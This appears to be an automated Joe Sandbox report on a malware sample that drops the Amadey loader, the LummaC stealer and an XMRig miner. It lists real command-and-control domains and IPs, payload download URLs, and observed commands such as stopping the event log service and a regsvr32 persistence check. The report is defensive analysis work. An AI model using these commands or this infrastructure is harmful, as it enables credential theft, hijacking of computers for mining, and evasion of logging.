                          Source: Process startedAuthor: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 6072, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 4904, ProcessName: powershell.exe
                          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\pcqxl.exe, ParentImage: C:\Users\user\AppData\Local\Temp\pcqxl.exe, ParentProcessId: 5292, ParentProcessName: pcqxl.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 2992, ProcessName: sc.exe
                          No Suricata rule has matched


                          AV Detection

                          Source: file.exeAvira: detected
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpllAvira URL Cloud: Label: phishing
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtPAvira URL Cloud: Label: phishing
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpvohvtbtkkqqpcgvyAvira URL Cloud: Label: phishing
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php--cinit-version=3.4.1--nicehashAvira URL Cloud: Label: phishing
                          Source: http://185.215.113.16/off/def.exe;Avira URL Cloud: Label: malware
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php6Avira URL Cloud: Label: phishing
                          Source: http://zealous-roentgen.66-63-187-122.plesk.pageAvira URL Cloud: Label: phishing
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/98.exeAvira URL Cloud: Label: phishing
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtTaskmgr.exeAvira URL Cloud: Label: phishing
                          Source: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtAvira URL Cloud: Label: phishing
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeAvira: detection malicious, Label: TR/Dropper.Gen2
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exeAvira: detection malicious, Label: TR/Dropper.Gen2
                          Source: C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                          Source: C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                          Source: e44fda3216.exe.1608.11.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["crowdwarek.shop", "apporholis.shop", "letterdrive.shop", "handscreamny.shop", "chipdonkeruz.shop", "soundtappysk.shop", "robinsharez.shop", "femalsabler.shop", "versersleep.shop"], "Build id": "LOGS11--6969"}
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeReversingLabs: Detection: 78%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9LbUK15[1].exeReversingLabs: Detection: 15%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeReversingLabs: Detection: 13%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exeReversingLabs: Detection: 52%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeReversingLabs: Detection: 36%
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeReversingLabs: Detection: 15%
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeReversingLabs: Detection: 52%
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeReversingLabs: Detection: 13%
                          Source: C:\Users\user\AppData\Local\Temp\1034109001\bed2608720.exeReversingLabs: Detection: 36%
                          Source: file.exeReversingLabs: Detection: 57%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.6% probability
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9LbUK15[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exeJoe Sandbox ML: detected
                          Source: file.exeJoe Sandbox ML: detected

                          Exploits

                          Source: Yara matchFile source: 00000006.00000002.3336204963.0000000002486000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 9LbUK15.exe PID: 7776, type: MEMORYSTR

                          Bitcoin Miner

                          Source: Yara matchFile source: 53.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6596, type: MEMORYSTR
                          Source: svchost.exe, 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                          Source: svchost.exe, 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                          Source: svchost.exe, 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                          Source: svchost.exe, 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Livid Pocket_is1
                          Source: Binary string: Qzqfjz.pdb source: Ele.exe, 00000015.00000002.3080168462.000000001BF00000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ele.exe, 00000009.00000002.3318620989.000000000326A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Administrator\Desktop\Calculadora\Calculadora\obj\Debug\Calculadora.pdbMhgh Yh_CorExeMainmscoree.dll source: 9LbUK15.exe, 00000006.00000000.2297604594.0000000000062000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: pyexpat.pyd.55.dr
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ele.exe, 00000009.00000002.3318620989.000000000326A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: yklcfqtilcgt.exe, 0000002B.00000003.2499734938.000001ADB9DA0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: e44fda3216.exe, 0000000B.00000003.2733601051.0000000007CD0000.00000004.00001000.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3327334251.0000000005BA2000.00000040.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Administrator\Desktop\Calculadora\Calculadora\obj\Debug\Calculadora.pdb source: 9LbUK15.exe, 00000006.00000000.2297604594.0000000000062000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: protobuf-net.pdb source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: db3cab6cee.exe, 00000037.00000003.2710982962.000001E194DF4000.00000004.00000020.00020000.00000000.sdmp, db3cab6cee.exe, 00000037.00000002.3303641960.00007FF6F0648000.00000002.00000001.01000000.0000001E.sdmp, db3cab6cee.exe, 00000037.00000000.2700074672.00007FF6F0648000.00000002.00000001.01000000.0000001E.sdmp, db3cab6cee.exe, 00000037.00000003.2707112122.000001E1964A4000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: zjFtdxQ.tmp, 0000000D.00000003.2408195203.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, zjFtdxQ.tmp, 0000000D.00000003.2412265695.0000000003508000.00000004.00001000.00020000.00000000.sdmp
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: number of queries: 1001
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior

                          Networking

                          Source: Malware configuration extractorURLs: crowdwarek.shop
                          Source: Malware configuration extractorURLs: apporholis.shop
                          Source: Malware configuration extractorURLs: letterdrive.shop
                          Source: Malware configuration extractorURLs: handscreamny.shop
                          Source: Malware configuration extractorURLs: chipdonkeruz.shop
                          Source: Malware configuration extractorURLs: soundtappysk.shop
                          Source: Malware configuration extractorURLs: robinsharez.shop
                          Source: Malware configuration extractorURLs: femalsabler.shop
                          Source: Malware configuration extractorURLs: versersleep.shop
                          Source: Malware configuration extractorIPs: 185.215.113.43
                          Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                          Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                          Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E5E0C0 recv,recv,recv,recv,0_2_00E5E0C0
                          Source: e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                          Source: e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.0000000000607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                          Source: e44fda3216.exe, 0000000B.00000002.3295646287.00000000004FA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe;
                          Source: e44fda3216.exe, 0000000B.00000003.2765743260.0000000000618000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.0000000000607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeEM
                          Source: e44fda3216.exe, 0000000B.00000003.2765743260.0000000000618000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.0000000000607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeEx
                          Source: e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exea
                          Source: e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16:80/off/def.exe
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: 9LbUK15.exe, 00000006.00000002.3336204963.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2541734851.000001F1E2221000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 00000014.00000002.3318904370.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 00000014.00000002.3318904370.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000015.00000002.2873162954.0000000003002000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000015.00000002.2873162954.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000015.00000002.2873162954.000000000302A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: db3cab6cee.exe, 00000037.00000003.2778721078.000001E1978C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://svn.red-bean.com/bob/macholib/trunk/macholib/
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: zjFtdxQ.exe, 0000000C.00000003.2406324189.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, zjFtdxQ.exe, 0000000C.00000003.2406604387.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, zjFtdxQ.tmp, 0000000D.00000000.2407228078.0000000000401000.00000020.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.innosetup.com/
                          Source: powershell.exe, 00000012.00000002.2797013531.000001F1FA5C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                          Source: zjFtdxQ.exe, 0000000C.00000003.2406324189.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, zjFtdxQ.exe, 0000000C.00000003.2406604387.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, zjFtdxQ.tmp, 0000000D.00000000.2407228078.0000000000401000.00000020.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.remobjects.com/ps
                          Source: NzL6O1Q.exe, 00000036.00000002.2660245911.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 00000038.00000002.2772672234.0000000002B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                          Source: e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: Ele.exe, 00000009.00000002.3318620989.0000000003661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zealous-roentgen.66-63-187-122.plesk.page
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                          Source: _psosx.pyc.55.drString found in binary or memory: https://arstechnica.com/civis/viewtopic.php?f=19&t=465002.
                          Source: e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                          Source: e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                          Source: e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: powershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: regsvr32.exe, 00000011.00000002.3302250215.00007FFDF6E38000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F207C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F20756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F207C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F207A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.2339462163.0000026F207F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F207C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                          Source: 9LbUK15.exe, 00000006.00000002.3336204963.00000000023D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: 9LbUK15.exe, 00000006.00000002.3336204963.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, 9LbUK15.exe, 00000006.00000000.2297604594.0000000000062000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/Zankop/baxter/raw/refs/heads/master/1027
                          Source: _compat.pyc0.55.drString found in binary or memory: https://github.com/giampaolo/psutil/issues/1659)
                          Source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                          Source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                          Source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                          Source: NzL6O1Q.exe, 00000014.00000002.3318904370.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 0000001E.00000002.2506834918.0000000003051000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 00000036.00000002.2660245911.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 00000038.00000002.2772672234.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
                          Source: e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: _legacy.pyc.55.drString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
                          Source: e44fda3216.exe, 0000000B.00000003.2750455557.000000000060B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/
                          Source: e44fda3216.exe, 0000000B.00000003.2625395130.0000000000605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/1520
                          Source: e44fda3216.exe, 0000000B.00000003.2440651482.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2439713957.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/K0
                          Source: e44fda3216.exe, 0000000B.00000003.2466779696.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2476670946.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2475404002.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2451953024.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506333471.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/Y
                          Source: e44fda3216.exe, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2451466201.0000000000618000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433409561.0000000005348000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/api
                          Source: e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/api$
